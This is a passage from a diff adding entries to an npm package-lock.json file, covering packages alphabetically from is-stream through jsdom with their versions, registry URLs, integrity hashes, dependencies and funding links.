"sha512-nA2hv5XIhLR3uVzDDfCIknerhx8XUKnstuOERPNNIinXG7v9u+ohXF67vxm4TPTEPU6lm61ZkwP3c9PCB97rhg==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-stream": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", + "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-stream-ended": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/is-stream-ended/-/is-stream-ended-0.1.4.tgz", + "integrity": "sha512-xj0XPvmr7bQFTvirqnFr50o0hQIh6ZItDqloxt5aJrR4NQsYeSsyFQERYGCAzfindAcnKjINnwEEgLx4IqVzQw==" + }, + "node_modules/is-string": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/is-string/-/is-string-1.0.7.tgz", + "integrity": "sha512-tE2UXzivje6ofPW7l23cjDOMa09gb7xlAqG6jG5ej6uPV32TlWP3NKPigtaGeHNu9fohccRYvIiZMfOOnOYUtg==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-symbol": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/is-symbol/-/is-symbol-1.0.4.tgz", + "integrity": "sha512-C/CPBqKWnvdcxqIARxyOh4v1UUEOCHpgDa0WYgpKDFMszcrPcffg5uhwSgPCLD2WWxmq6isisz87tzT01tuGhg==", + "dependencies": { + "has-symbols": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-typed-array": { + "version": "1.1.13", + "resolved": "https://registry.npmjs.org/is-typed-array/-/is-typed-array-1.1.13.tgz", + "integrity": "sha512-uZ25/bUAlUY5fR4OKT4rZQEBrzQWYV9ZJYGGsUmEJ6thodVJ1HX64ePQ6Z0qPWP+m+Uq6e9UugrE38jeYsDSMw==", + "license": "MIT", + "dependencies": { + "which-typed-array": "^1.1.14" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-typedarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", + "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" + }, + "node_modules/is-unicode-supported": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/is-unicode-supported/-/is-unicode-supported-0.1.0.tgz", + "integrity": "sha512-knxG2q4UC3u8stRGyAVJCOdxFmv5DZiRcdlIaAQXAbSfJya+OhopNotLQrstBhququ4ZpuKbDc/8S6mgXgPFPw==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-valid-glob": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/is-valid-glob/-/is-valid-glob-1.0.0.tgz", + "integrity": "sha512-AhiROmoEFDSsjx8hW+5sGwgKVIORcXnrlAx/R0ZSeaPw70Vw0CqkGBBhHGL58Uox2eXnU1AnvXJl1XlyedO5bA==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-valid-hostname": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-valid-hostname/-/is-valid-hostname-1.0.2.tgz", + "integrity": "sha512-X/kiF3Xndj6WI7l/yLyzR7V1IbQd6L4S4cewSL0fRciemPmHbaXIKR2qtf+zseH+lbMG0vFp4HvCUe7amGZVhw==" + }, + "node_modules/is-weakmap": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/is-weakmap/-/is-weakmap-2.0.1.tgz", + "integrity": "sha512-NSBR4kH5oVj1Uwvv970ruUkCV7O1mzgVFO4/rev2cLRda9Tm9HrL70ZPut4rOHgY0FNrUu9BCbXA2sdQ+x0chA==", + "dev": true, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-weakref": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-weakref/-/is-weakref-1.0.2.tgz", + "integrity": "sha512-qctsuLZmIQ0+vSSMfoVvyFe2+GSEvnmZ2ezTup1SBse9+twCCeial6EEi3Nc2KFcf6+qz2FBPnjXsk8xhKSaPQ==", + "dependencies": { + "call-bind": "^1.0.2" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-weakset": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-weakset/-/is-weakset-2.0.2.tgz", + "integrity": "sha512-t2yVvttHkQktwnNNmBQ98AhENLdPUTDTE21uPqAQ0ARwQfGeQKRVS0NNurH7bTf7RrvcVn1OOge45CnBeHCSmg==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "get-intrinsic": "^1.1.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-what": { + "version": "3.14.1", + "resolved": "https://registry.npmjs.org/is-what/-/is-what-3.14.1.tgz", + "integrity": "sha512-sNxgpk9793nzSs7bA6JQJGeIuRBQhAaNGG77kzYQgMkrID+lS6SlK07K5LaptscDlSaIgH+GPFzf+d75FVxozA==", + "dev": true + }, + "node_modules/is-windows": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-windows/-/is-windows-1.0.2.tgz", + "integrity": "sha512-eXK1UInq2bPmjyX6e3VHIzMLobc4J94i4AWn+Hpq3OU5KkrRC96OAcR3PRJ/pGu6m8TRnBHP9dkXQVsT/COVIA==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-wsl": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/is-wsl/-/is-wsl-2.2.0.tgz", + "integrity": "sha512-fKzAra0rGJUUBwGBgNkHZuToZcn+TtXHpeCgmkMJMMYx1sQDYaCSyjJBSCa2nH1DGm7s3n1oBnohoVTBaN7Lww==", + "dependencies": { + "is-docker": "^2.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/isarray": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-2.0.5.tgz", + "integrity": "sha512-xHjhDr3cNBK0BzdUJSPXZntQUx/mwMS5Rw4A7lPJ90XGAO6ISP/ePDNuo0vhqOZU+UD5JoodwCAAoZQd3FeAKw==" + }, + "node_modules/isexe": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", + "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=" + }, + "node_modules/isobject": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/isobject/-/isobject-3.0.1.tgz", + "integrity": "sha1-TkMekrEalzFjaqH5yNHMvP2reN8=", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/isomorphic-git": { + "version": "1.29.0", + "resolved": "https://registry.npmjs.org/isomorphic-git/-/isomorphic-git-1.29.0.tgz", + "integrity": "sha512-zWGqk8901cicvVEhVpN76AwKrS/TzHak2NQCtNXIAavpMIy/yqh+d/JtC9A8AUKZAauUdOyEWKI29tuCLAL+Zg==", + "dev": true, + "license": "MIT", + "dependencies": { + "async-lock": "^1.4.1", + "clean-git-ref": "^2.0.1", + "crc-32": "^1.2.0", + "diff3": "0.0.3", + "ignore": "^5.1.4", + "minimisted": "^2.0.0", + "pako": "^1.0.10", + "path-browserify": "^1.0.1", + "pify": "^4.0.1", + "readable-stream": "^3.4.0", + "sha.js": "^2.4.9", + "simple-get": "^4.0.1" + }, + "bin": { + "isogit": "cli.cjs" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/isomorphic-git/node_modules/pify": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/pify/-/pify-4.0.1.tgz", + "integrity": "sha512-uB80kBFb/tfd68bVleG9T5GGsGPjJrLAUpR5PZIrhBnIaRTQRjqdJSsIKkOP6OAIFbj7GOrcudc5pNjZ+geV2g==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/isomorphic-git/node_modules/simple-get": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/simple-get/-/simple-get-4.0.1.tgz", + "integrity": "sha512-brv7p5WgH0jmQJr1ZDDfKDOSeWWg+OVypG99A/5vYGPqJ6pxiaHLy8nxtFjBA7oMa01ebA9gfh1uMCFqOuXxvA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT", + "dependencies": { + "decompress-response": "^6.0.0", + "once": "^1.3.1", + "simple-concat": "^1.0.0" + } + }, + "node_modules/isomorphic-textencoder": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/isomorphic-textencoder/-/isomorphic-textencoder-1.0.1.tgz", + "integrity": "sha512-676hESgHullDdHDsj469hr+7t3i/neBKU9J7q1T4RHaWwLAsaQnywC0D1dIUId0YZ+JtVrShzuBk1soo0+GVcQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-text-encoding": "^1.0.0" + } + }, + "node_modules/isstream": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", + "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" + }, + "node_modules/istanbul-lib-coverage": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", + "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", + "dev": true, + "dependencies": { + "istanbul-lib-coverage": "^3.0.0", + "make-dir": "^3.0.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/istanbul-lib-report/node_modules/make-dir": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", + "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", + "dev": true, + "dependencies": { + "semver": "^6.0.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/istanbul-lib-report/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/istanbul-reports": { + "version": "3.1.5", + "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", + "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", + "dev": true, + "dependencies": { + "html-escaper": "^2.0.0", + "istanbul-lib-report": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/jackspeak": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", + "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", + "dev": true, + "license": "BlueOak-1.0.0", + "dependencies": { + "@isaacs/cliui": "^8.0.2" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + }, + "optionalDependencies": { + "@pkgjs/parseargs": "^0.11.0" + } + }, + "node_modules/jaeger-client": { + "version": "3.19.0", + "resolved": "https://registry.npmjs.org/jaeger-client/-/jaeger-client-3.19.0.tgz", + "integrity": "sha512-M0c7cKHmdyEUtjemnJyx/y9uX16XHocL46yQvyqDlPdvAcwPDbHrIbKjQdBqtiE4apQ/9dmr+ZLJYYPGnurgpw==", + "dependencies": { + "node-int64": "^0.4.0", + "opentracing": "^0.14.4", + "thriftrw": "^3.5.0", + "uuid": "^8.3.2", + "xorshift": "^1.1.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/jaeger-client/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/jake": { + "version": "10.8.5", + "resolved": "https://registry.npmjs.org/jake/-/jake-10.8.5.tgz", + "integrity": "sha512-sVpxYeuAhWt0OTWITwT98oyV0GsXyMlXCF+3L1SuafBVUIr/uILGRB+NqwkzhgXKvoJpDIpQvqkUALgdmQsQxw==", + "dependencies": { + "async": "^3.2.3", + "chalk": "^4.0.2", + "filelist": "^1.0.1", + "minimatch": "^3.0.4" + }, + "bin": { + "jake": "bin/cli.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/jake/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/jake/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/jake/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/jest-util": { + "version": "29.7.0", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", + "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", + "dev": true, + "dependencies": { + "@jest/types": "^29.6.3", + "@types/node": "*", + "chalk": "^4.0.0", + "ci-info": "^3.2.0", + "graceful-fs": "^4.2.9", + "picomatch": "^2.2.3" + }, + "engines": { + "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + } + }, + "node_modules/jest-util/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/jest-util/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/jest-util/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/jest-worker": { + "version": "27.5.1", + "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-27.5.1.tgz", + "integrity": "sha512-7vuh85V5cdDofPyxn58nrPjBktZo0u9x1g8WtjQol+jZDaE+fhN+cIvTj11GndBnMnyfrUOG1sZQxCdjKh+DKg==", + "dev": true, + "dependencies": { + "@types/node": "*", + "merge-stream": "^2.0.0", + "supports-color": "^8.0.0" + }, + "engines": { + "node": ">= 10.13.0" + } + }, + "node_modules/jiti": { + "version": "1.18.2", + "resolved": "https://registry.npmjs.org/jiti/-/jiti-1.18.2.tgz", + "integrity": "sha512-QAdOptna2NYiSSpv0O/BwoHBSmz4YhpzJHyi+fnMRTXFjp7B8i/YG5Z8IfusxB1ufjcD2Sre1F3R+nX3fvy7gg==", + "dev": true, + "bin": { + "jiti": "bin/jiti.js" + } + }, + "node_modules/jmespath": { + "version": "0.16.0", + "resolved": "https://registry.npmjs.org/jmespath/-/jmespath-0.16.0.tgz", + "integrity": "sha512-9FzQjJ7MATs1tSpnco1K6ayiYE3figslrXA72G2HQ/n76RzvYlofyi5QM+iX4YRs/pu3yzxlVQSST23+dMDknw==", + "engines": { + "node": ">= 0.6.0" + } + }, + "node_modules/joi": { + "version": "17.12.0", + "resolved": "https://registry.npmjs.org/joi/-/joi-17.12.0.tgz", + "integrity": "sha512-HSLsmSmXz+PV9PYoi3p7cgIbj06WnEBNT28n+bbBNcPZXZFqCzzvGqpTBPujx/Z0nh1+KNQPDrNgdmQ8dq0qYw==", + "dependencies": { + "@hapi/hoek": "^9.3.0", + "@hapi/topo": "^5.1.0", + "@sideway/address": "^4.1.4", + "@sideway/formula": "^3.0.1", + "@sideway/pinpoint": "^2.0.0" + } + }, + "node_modules/jose": { + "version": "4.15.5", + "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", + "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", + "funding": { + "url": "https://github.com/sponsors/panva" + } + }, + "node_modules/jquery": { + "version": "3.7.1", + "resolved": "https://registry.npmjs.org/jquery/-/jquery-3.7.1.tgz", + "integrity": "sha512-m4avr8yL8kmFN8psrbFFFmB/If14iN5o9nw/NgnnM+kybDJpRsAynV2BsfpTYrTRysYUdADVD7CkUUizgkpLfg==" + }, + "node_modules/js-beautify": { + "version": "1.14.7", + "resolved": "https://registry.npmjs.org/js-beautify/-/js-beautify-1.14.7.tgz", + "integrity": "sha512-5SOX1KXPFKx+5f6ZrPsIPEY7NwKeQz47n3jm2i+XeHx9MoRsfQenlOP13FQhWvg8JRS0+XLO6XYUQ2GX+q+T9A==", + "dev": true, + "dependencies": { + "config-chain": "^1.1.13", + "editorconfig": "^0.15.3", + "glob": "^8.0.3", + "nopt": "^6.0.0" + }, + "bin": { + "css-beautify": "js/bin/css-beautify.js", + "html-beautify": "js/bin/html-beautify.js", + "js-beautify": "js/bin/js-beautify.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/js-beautify/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/js-beautify/node_modules/glob": { + "version": "8.1.0", + "resolved": "https://registry.npmjs.org/glob/-/glob-8.1.0.tgz", + "integrity": "sha512-r8hpEjiQEYlF2QU0df3dS+nxxSIreXQS1qRhMJM0Q5NDdR386C7jb7Hwwod8Fgiuex+k0GFjgft18yvxm5XoCQ==", + "dev": true, + "dependencies": { + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^5.0.1", + "once": "^1.3.0" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/js-beautify/node_modules/minimatch": { + "version": "5.1.6", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", + "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/js-beautify/node_modules/nopt": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/nopt/-/nopt-6.0.0.tgz", + "integrity": "sha512-ZwLpbTgdhuZUnZzjd7nb1ZV+4DoiC6/sfiVKok72ym/4Tlf+DFdlHYmT2JPmcNNWV6Pi3SDf1kT+A4r9RTuT9g==", + "dev": true, + "dependencies": { + "abbrev": "^1.0.0" + }, + "bin": { + "nopt": "bin/nopt.js" + }, + "engines": { + "node": "^12.13.0 || ^14.15.0 || >=16.0.0" + } + }, + "node_modules/js-stringify": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/js-stringify/-/js-stringify-1.0.2.tgz", + "integrity": "sha512-rtS5ATOo2Q5k1G+DADISilDA6lv79zIiwFd6CcjuIxGKLFm5C+RLImRscVap9k55i+MOZwgliw+NejvkLuGD5g==" + }, + "node_modules/js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==" + }, + "node_modules/js-yaml": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", + "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", + "dependencies": { + "argparse": "^2.0.1" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "node_modules/js2xmlparser": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/js2xmlparser/-/js2xmlparser-4.0.2.tgz", + "integrity": "sha512-6n4D8gLlLf1n5mNLQPRfViYzu9RATblzPEtm1SthMX1Pjao0r9YI9nw7ZIfRxQMERS87mcswrg+r/OYrPRX6jA==", + "dependencies": { + "xmlcreate": "^2.0.4" + } + }, + "node_modules/jsbn": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", + "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" + }, + "node_modules/jscodeshift": { + "version": "17.0.0", + "resolved": "https://registry.npmjs.org/jscodeshift/-/jscodeshift-17.0.0.tgz", + "integrity": "sha512-Af+MFsNwLSVO+t4kKjJdJKh6iNbNHfDfFGdyltJ2wUFN3furgbvHguJmB85iou+fY7wbHgI8eiEKpp6doGgtKg==", + "dev": true, + "dependencies": { + "@babel/core": "^7.24.7", + "@babel/parser": "^7.24.7", + "@babel/plugin-transform-class-properties": "^7.24.7", + "@babel/plugin-transform-modules-commonjs": "^7.24.7", + "@babel/plugin-transform-nullish-coalescing-operator": "^7.24.7", + "@babel/plugin-transform-optional-chaining": "^7.24.7", + "@babel/plugin-transform-private-methods": "^7.24.7", + "@babel/preset-flow": "^7.24.7", + "@babel/preset-typescript": "^7.24.7", + "@babel/register": "^7.24.6", + "flow-parser": "0.*", + "graceful-fs": "^4.2.4", + "micromatch": "^4.0.7", + "neo-async": "^2.5.0", + "picocolors": "^1.0.1", + "recast": "^0.23.9", + "temp": "^0.9.4", + "write-file-atomic": "^5.0.1" + }, + "bin": { + "jscodeshift": "bin/jscodeshift.js" + }, + "engines": { + "node": ">=16" + }, + "peerDependencies": { + "@babel/preset-env": "^7.1.6" + }, + "peerDependenciesMeta": { + "@babel/preset-env": { + "optional": true + } + } + }, + "node_modules/jscodeshift/node_modules/rimraf": { + "version": "2.6.3", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.6.3.tgz", + "integrity": "sha512-mwqeW5XsA2qAejG46gYdENaxXjx9onRNCfn7L0duuP4hCuTIi/QO7PDK07KJfp1d+izWPrzEJDcSqBa0OZQriA==", + "deprecated": "Rimraf versions prior to v4 are no longer supported", + "dev": true, + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + } + }, + "node_modules/jscodeshift/node_modules/temp": { + "version": "0.9.4", + "resolved": "https://registry.npmjs.org/temp/-/temp-0.9.4.tgz", + "integrity": "sha512-yYrrsWnrXMcdsnu/7YMYAofM1ktpL5By7vZhf15CrXijWWrEYZks5AXBudalfSWJLlnen/QUJUB5aoB0kqZUGA==", + "dev": true, + "dependencies": { + "mkdirp": "^0.5.1", + "rimraf": "~2.6.2" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/jsdoc": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/jsdoc/-/jsdoc-4.0.3.tgz", + "integrity": "sha512-Nu7Sf35kXJ1MWDZIMAuATRQTg1iIPdzh7tqJ6jjvaU/GfDf+qi5UV8zJR3Mo+/pYFvm8mzay4+6O5EWigaQBQw==", + "dependencies": { + "@babel/parser": "^7.20.15", + "@jsdoc/salty": "^0.2.1", + "@types/markdown-it": "^14.1.1", + "bluebird": "^3.7.2", + "catharsis": "^0.9.0", + "escape-string-regexp": "^2.0.0", + "js2xmlparser": "^4.0.2", + "klaw": "^3.0.0", + "markdown-it": "^14.1.0", + "markdown-it-anchor": "^8.6.7", + "marked": "^4.0.10", + "mkdirp": "^1.0.4", + "requizzle": "^0.2.3", + "strip-json-comments": "^3.1.0", + "underscore": "~1.13.2" + }, + "bin": { + "jsdoc": "jsdoc.js" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/jsdoc-type-pratt-parser": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/jsdoc-type-pratt-parser/-/jsdoc-type-pratt-parser-4.1.0.tgz", + "integrity": "sha512-Hicd6JK5Njt2QB6XYFS7ok9e37O8AYk3jTcppG4YVQnYjOemymvTcmc7OWsmq/Qqj5TdRFO5/x/tIPmBeRtGHg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/jsdoc/node_modules/escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", + "engines": { + "node": ">=8" + } + }, + "node_modules/jsdoc/node_modules/mkdirp": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", + "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", + "bin": { + "mkdirp": "bin/cmd.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/jsdom": { + "version": "19.0.0", + "resolved": "https://registry.npmjs.org/jsdom/-/jsdom-19.0.0.tgz", + "integrity": "sha512-RYAyjCbxy/vri/CfnjUWJQQtZ3LKlLnDqj+9XLNnJPgEGeirZs3hllKR20re8LUZ6o1b1X4Jat+Qd26zmP41+A==", + "dev": true, + "dependencies": { + "abab": "^2.0.5", + "acorn": "^8.5.0", + "acorn-globals": "^6.0.0", + "cssom": "^0.5.0", + "cssstyle": "^2.3.0", + "data-urls": "^3.0.1", + "decimal.js": "^10.3.1", + "domexception": "^4.0.0", + "escodegen": "^2.0.0", + "form-data": "^4.0.0", + "html-encoding-sniffer": "^3.0.0", + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": 